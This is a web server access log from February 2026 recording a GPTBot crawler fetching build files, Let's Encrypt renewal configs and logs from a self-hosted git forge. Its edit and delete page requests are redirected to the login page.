"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10677] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14925] [Gzip 9.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11187] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11187] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10209] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10209] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11935] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:16:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44909] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51769] [Gzip 13.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39839] [Gzip 13.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11274] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:16:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:16:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11134] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:16:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:16:34:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:34:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:34:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:34:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:34:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:34:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:16:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 